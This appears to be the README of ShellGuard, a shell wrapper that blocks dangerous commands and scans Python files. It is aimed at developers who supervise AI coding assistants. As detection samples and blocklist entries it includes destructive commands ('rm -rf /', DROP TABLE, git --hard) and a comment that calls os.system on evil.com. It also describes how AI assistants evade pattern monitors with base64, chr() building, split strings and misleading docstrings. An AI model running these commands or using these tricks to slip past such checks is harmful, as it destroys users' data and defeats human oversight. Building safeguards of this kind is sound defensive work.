Your shell’s bodyguard - Intelligent command interceptor and safety net for developers
ShellGuard is a lightweight, ultra-sensitive shell wrapper that protects your development environment from dangerous commands, provides automatic backups, and gives you instant rollback capabilities. Perfect for controlling AI assistants, preventing accidents, and maintaining project health.
ShellGuard is so sensitive that it even catches dangerous patterns in:
- Comments (# os.system dangerous)
- Strings ("rm -rf" in dictionaries)
Real example: ShellGuard blocked its own security analysis code for containing pattern examples! 🎯
Quick install (current session only):
curl -fsSL https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh -o shellguard.sh && chmod +x shellguard.sh && source shellguard.sh && echo "✅ ShellGuard activated!"
Project install (made permanent via ~/.bashrc):
curl -fsSL https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh -o shellguard.sh && chmod +x shellguard.sh && source shellguard.sh && echo "source $(pwd)/shellguard.sh" >> ~/.bashrc && echo "✅ Project install complete!"
# Install ShellGuard
curl -o shellguard.sh https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh
chmod +x shellguard.sh
# Activate for current session
source shellguard.sh
# Make permanent (optional)
echo "source $(pwd)/shellguard.sh" >> ~/.bashrc
That’s it! Your shell is now protected. 🎉
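ShellGuard works by defining shell functions that shadow commands such as rm, python, npm, and git (the same overrides the Troubleshooting section shows how to remove). To confirm the override is active in your current session:
type rm
# While ShellGuard is active this reports a shell function, not /usr/bin/rm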
Catches patterns in code comments:
# This code uses os.system() for file operations
🚨 Dangerous Python code detected in: example.py
Content preview:
1:# This code uses os.system() for file operations
Use 'force_python example.py' to run anyway
Detects obfuscated dangerous patterns:
dangerous_command = "r" + "m" + " -rf"
🚨 Dangerous pattern detected during execution
Finds patterns in string dictionaries:
help_text = {
    "rm": "rm -rf removes files recursively",
    "caution": "Never use os.system() in production"
}
🚨 Dangerous Python code detected in: help.py
Content preview:
2: "rm": "rm -rf removes files recursively"
3: "caution": "Never use os.system() in production"
Scenario 1: Base64 Obfuscation
import base64
dangerous = base64.b64decode("cm0gLXJm").decode() # "rm -rf"
🚨 BLOCKED: ShellGuard detected encoded dangerous pattern
Scenario 2: Character Building
cmd = chr(114) + chr(109) + " -rf" # Building "rm -rf"
🚨 BLOCKED: Pattern construction detected during execution
Scenario 3: Split Strings
part1 = "os.sys"
part2 = "tem("
dangerous_func = part1 + part2
🚨 BLOCKED: Dangerous function assembly detected
Scenario 4: AI Documentation Tricks
"""
This function is safe and does NOT use os.system() calls
Actually safe, definitely not calling os.system("rm -rf /")
"""
def safe_function():
    pass
🚨 Dangerous Python code detected in: ai_trick.py
Content preview:
3:Actually safe, definitely not calling os.system("rm -rf /")
Use 'force_python ai_trick.py' to run anyway
Why so sensitive? Because AI assistants are getting smarter at hiding dangerous code. ShellGuard catches ALL of these tricks! 🎯
status # Show complete system status
health # Run full project health check
check # Quick health check (perfect for AI)
Example output:
📊 ShellGuard STATUS
==================================
Health Score: 95/100 ✅
Commands Blocked: 3
Last Backup: backup_20241205_143022
Session Started: 2024-12-05T14:25:33
==================================
backup # Create manual backup
rollback # Restore from last backup
emergency # Emergency reset with confirmation
When ShellGuard blocks a command, use these safe alternatives:
safe_rm file.txt # Delete with automatic backup
force_git reset --hard # Git command with backup
force_python script.py # Run Python despite warnings
block "pattern" # Add custom dangerous pattern
llm_help # Show all available commands
Perfect session flow:
USER: "Check the project status"
AI: status
# 📊 Health Score: 98/100 ✅
USER: "Create a calculator script"
AI: [creates calculator.py]
USER: "Test the script"
AI: python calculator.py
# ✅ Syntax OK, Security OK, Execution successful
USER: "Commit the changes"
AI: git add . && git commit -m "Add calculator"
# ✅ Changes committed successfully
When AI tries something dangerous:
AI: rm -rf temp/
# 🚨 BLOCKED: Dangerous pattern detected: rm -rf
# Use 'safe_rm' if you really need to delete files
AI: safe_rm temp/
# ⚠️ Using SAFE RM - creating backup first
# 📦 Creating backup: backup_20241205_144523
# ✅ Files deleted safely
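Conceptually, safe_rm is just "back up first, then delete". A minimal sketch of that idea, assuming the ~/.shellguard/backups layout shown later in this README (the real implementation lives in shellguard.sh):
# Sketch only - not the actual shellguard.sh code
safe_rm_sketch() {
  local stamp="backup_$(date +%Y%m%d_%H%M%S)"
  mkdir -p ~/.shellguard/backups/"$stamp"
  cp -r "$@" ~/.shellguard/backups/"$stamp"/ || return 1
  command rm -rf "$@"   # "command" bypasses ShellGuard's rm override
  echo "✅ Files deleted safely (backup: $stamp)"
}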
When AI tries to be sneaky:
AI: [Creates file with hidden dangerous patterns in comments]
AI: python ai_generated.py
# 🚨 Dangerous Python code detected in: ai_generated.py
# Content preview:
# 15:# Example: os.system("rm -rf /tmp")
# Use 'force_python ai_generated.py' to run anyway
USER: "Remove the dangerous examples from comments"
AI: [Creates clean version]
AI: python ai_generated_clean.py
# ✅ Clean code executed successfully
Example 1: Comments with dangerous patterns
# cleanup.py
def cleanup_files():
    """
    This function cleans up files.
    WARNING: Never use os.system('rm -rf /') in production!
    Example of what NOT to do: eval(user_input)
    """
    print("Cleaning up safely...")
python cleanup.py
# 🚨 Dangerous Python code detected in: cleanup.py
# Content preview:
# 4: WARNING: Never use os.system('rm -rf /') in production!
# 5: Example of what NOT to do: eval(user_input)
# Use 'force_python cleanup.py' to run anyway
Example 2: String dictionaries
# help_system.py
COMMAND_HELP = {
    "delete": "Use rm -rf for recursive deletion",
    "execute": "os.system() executes shell commands",
    "evaluate": "eval() runs dynamic code"
}
python help_system.py
# 🚨 Dangerous Python code detected in: help_system.py
# Content preview:
# 3: "delete": "Use rm -rf for recursive deletion",
# 4: "execute": "os.system() executes shell commands",
# 5: "evaluate": "eval() runs dynamic code"
# Use 'force_python help_system.py' to run anyway
Example 3: AI trying to hide malicious code
# ai_malware.py - AI-generated "innocent" file
"""
Utility functions for file management.
This code is completely safe and secure.
"""
def get_system_info():
    # Just getting system info, nothing dangerous
    # Definitely not using os.system("curl evil.com/steal")
    return "System info"

def cleanup_temp():
    # Safe cleanup function
    # Not using dangerous rm -rf operations
    pass
python ai_malware.py
# 🚨 Dangerous Python code detected in: ai_malware.py
# Content preview:
# 8: # Definitely not using os.system("curl evil.com/steal")
# 12: # Not using dangerous rm -rf operations
# Use 'force_python ai_malware.py' to run anyway
Automatic backups before package installations:
npm install some-package
# 🔍 Installing new packages: some-package
# 📦 Creating backup before package installation...
# ✅ Git backup created
# [normal npm install proceeds]
git reset --hard HEAD~5
# 🚨 BLOCKED: Dangerous pattern detected: --hard
# Use 'force_git' if you really need this git command
force_git reset --hard HEAD~5
# ⚠️ Using FORCE GIT - creating backup first
# 📦 Creating backup: backup_20241205_144856
# [git command executes]
ShellGuard continuously monitors your project:
health
# 🔍 Checking project health...
# 🐍 Checking Python syntax...
# ✅ Syntax OK: calculator.py
# ✅ Syntax OK: utils.py
# 📦 Checking Node.js project...
# ✅ Valid package.json
# 🎉 Project health: GOOD (Score: 98/100)
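The Python syntax step can be reproduced by hand with the standard library's py_compile module; a rough equivalent of the check above (a sketch, not ShellGuard's actual code):
for f in *.py; do
  python -m py_compile "$f" && echo "✅ Syntax OK: $f"
done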
ShellGuard also runs a background monitor that keeps session state (health score, blocked-command counts, detection stats) up to date.
Default blocked patterns in ANY context:
- rm -rf - Recursive deletion (even in comments!)
- sudo rm - Root deletion
- DROP TABLE - Database destruction
- os.system( - Python system calls
- eval( / exec( - Code injection
- --force / --hard - Destructive Git flags
Advanced detection includes:
- chr(114) + chr(109) → "rm"
- "os." + "system"
- # Don't use rm -rf (patterns inside comments)
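You can approximate the comment-and-string layer yourself with grep; the -n flag also explains the numbered "Content preview" lines in the warnings (an illustration, not ShellGuard's exact rule set):
grep -nE 'rm -rf|os\.system\(|eval\(|exec\(' cleanup.py
# Prints each offending line with its line number, like the Content preview above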
Add your own patterns:
block "dangerous_function("
# ✅ Added pattern to blocklist: dangerous_function(
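Custom patterns are stored in ~/.shellguard/blocked.txt (see the file structure below), so the same effect can presumably be achieved by appending to that file directly:
echo 'dangerous_function(' >> ~/.shellguard/blocked.txt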
ShellGuard uses confidence scoring across pattern types:
- Direct patterns (rm -rf /)
- Constructed patterns (chr(114)+"m -rf")
- Patterns in comments (# example: rm -rf)
Blocked operations can still be run with force_* commands if intentional.
ShellGuard keeps its files under ~/.shellguard/:
~/.shellguard/
├── state.json      # Current system state
├── blocked.txt     # Custom blocked patterns
└── backups/        # Automatic backups
    ├── backup_20241205_143022/
    ├── backup_20241205_144523/
    └── backup_20241205_144856/
Edit ~/.shellguard/blocked.txt to add custom patterns:
your_dangerous_command
risky_operation
delete_everything
sneaky_ai_pattern
Adjust detection sensitivity in your shell:
export SHELLGUARD_SENSITIVITY=high # Ultra-sensitive (default)
export SHELLGUARD_SENSITIVITY=medium # Moderate detection
export SHELLGUARD_SENSITIVITY=low # Basic protection only
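The export only lasts for the current session; to make a level permanent, add it to your shell profile the same way the installer registers shellguard.sh:
echo 'export SHELLGUARD_SENSITIVITY=medium' >> ~/.bashrc  # or ~/.zshrc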
ShellGuard maintains state in ~/.shellguard/state.json:
{
  "health_score": 95,
  "last_backup": "backup_20241205_143022",
  "commands_blocked": 3,
  "files_changed": 2,
  "session_start": "2024-12-05T14:25:33",
  "warnings": [],
  "detection_stats": {
    "patterns_caught": 15,
    "ai_evasions_blocked": 7,
    "obfuscation_detected": 3
  }
}
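Because the state is plain JSON, standard tools can query it; for example, with jq installed:
jq '.health_score' ~/.shellguard/state.json
# 95
jq '.detection_stats.ai_evasions_blocked' ~/.shellguard/state.json
# 7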
# Quick assessment
status
# If health score is low
health
# Emergency rollback
emergency
# 🚨 EMERGENCY MODE
# This will rollback to last known good state
# Continue? (y/N): y
# List available backups
ls ~/.shellguard/backups/
# Manual restore (if emergency fails)
cp -r ~/.shellguard/backups/backup_TIMESTAMP/* .
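If you are not sure which backup is newest, ls -t sorts by modification time; a small helper based on the backup layout shown earlier:
latest=$(ls -t ~/.shellguard/backups | head -n 1)
cp -r ~/.shellguard/backups/"$latest"/* .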
# Check what's blocked
cat ~/.shellguard/blocked.txt
# Review recent commands
cat ~/.shellguard/state.json
# Temporarily reduce sensitivity
export SHELLGUARD_SENSITIVITY=low
# Disable temporarily (not recommended)
unset -f python npm git rm # Remove overrides
curl -o shellguard.sh https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh
chmod +x shellguard.sh
source shellguard.sh
git clone https://github.com/wronai/shellguard.git
cd shellguard
source shellguard.sh
# Download to standard location
curl -o ~/.shellguard.sh https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh
chmod +x ~/.shellguard.sh
# Add to shell profile
echo "source ~/.shellguard.sh" >> ~/.bashrc # or ~/.zshrc
source ~/.bashrc
Best practices:
- Run status at the beginning of each session
- Run backup before major changes
- Run health to check project state regularly
- Never use force_* commands without understanding the risks
- Use status or check health to show AI the project state
ShellGuard uses multi-layer pattern detection. In testing with various AI models, modern assistants tried to evade detection using:
- Base64 encoding and character construction
- Split strings assembled at runtime
- "Innocent" comments and docstrings that deny using rm -rf /
ShellGuard catches ALL of these techniques! 🎯
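As a mental model, each detection layer is a separate scan over the same file: first literal patterns, then decoded or assembled strings. A simplified sketch of that idea (an illustration with assumed patterns, not ShellGuard's real scanner):
# Sketch: two of the detection layers over one file
scan_file() {
  local f="$1"
  # Layer 1: literal patterns, even inside comments and strings
  grep -qE 'rm -rf|os\.system\(|eval\(' "$f" && { echo "🚨 literal pattern"; return 1; }
  # Layer 2: base64-looking blobs that decode to a known pattern
  for blob in $(grep -oE '[A-Za-z0-9+/]{8,}={0,2}' "$f"); do
    if echo "$blob" | base64 -d 2>/dev/null | grep -q 'rm -rf'; then
      echo "🚨 encoded pattern"; return 1
    fi
  done
  return 0
}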
“Too many false positives”
# Reduce sensitivity temporarily
export SHELLGUARD_SENSITIVITY=medium
# Or for specific files
force_python my_educational_examples.py
“ShellGuard blocked my legitimate security research”
# Use force commands with understanding
force_python security_research.py
# Or add exclusion pattern
block "!security_research_pattern"
“AI keeps getting blocked on innocent code”
# This is normal! Guide AI to write cleaner code
# Example: Instead of comments with dangerous examples,
# use abstract references: "avoid dangerous system calls"
See exactly what triggered detection:
# Enable verbose detection logging
export SHELLGUARD_VERBOSE=true
python suspect_file.py
Test specific patterns:
# Test if a pattern would be caught
echo "test rm -rf pattern" | shellguard_test_pattern
Reset detection statistics:
# Clear detection counters
rm ~/.shellguard/detection_stats.json
We welcome contributions! Here’s how to help:
1. Fork the repository
2. Create a feature branch (git checkout -b feature/amazing-feature)
3. Commit your changes (git commit -m 'Add amazing feature')
4. Push to the branch (git push origin feature/amazing-feature)
5. Open a Pull Request
Want to see how sensitive ShellGuard is? Try these test files:
Test 1: Comment patterns
# test_comments.py
"""
Educational file showing dangerous patterns.
Never use os.system() in production code!
Example of bad practice: rm -rf /tmp/*
"""
print("This file just has dangerous examples in comments")
Test 2: String dictionaries
# test_strings.py
EXAMPLES = {
    "bad": "Never do: rm -rf /",
    "worse": "Avoid: os.system(user_input)",
    "terrible": "Don't use: eval(untrusted_code)"
}
Test 3: Obfuscated patterns
# test_obfuscated.py
import base64
# This contains encoded dangerous pattern
encoded = "cm0gLXJm" # "rm -rf" in base64
All of these will be caught by ShellGuard! 🎯
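Because ShellGuard wraps the python command itself, simply running the files is enough to trigger the scanner:
for f in test_comments.py test_strings.py test_obfuscated.py; do
  python "$f"   # each run should report: 🚨 Dangerous Python code detected
done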
This project is licensed under the Apache 2.0 License - see the LICENSE file for details.
⭐ If ShellGuard saved your project from AI-generated malware, please star the repository!
Made with ❤️ by developers, for developers who work with AI.
Your shell’s bodyguard - because AI assistants are getting smarter, and so should your defenses.
Copyright (c) 2025 WRONAI - Tom Sapletta
Licensed under the Apache License, Version 2.0 (the “License”); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an “AS IS” BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.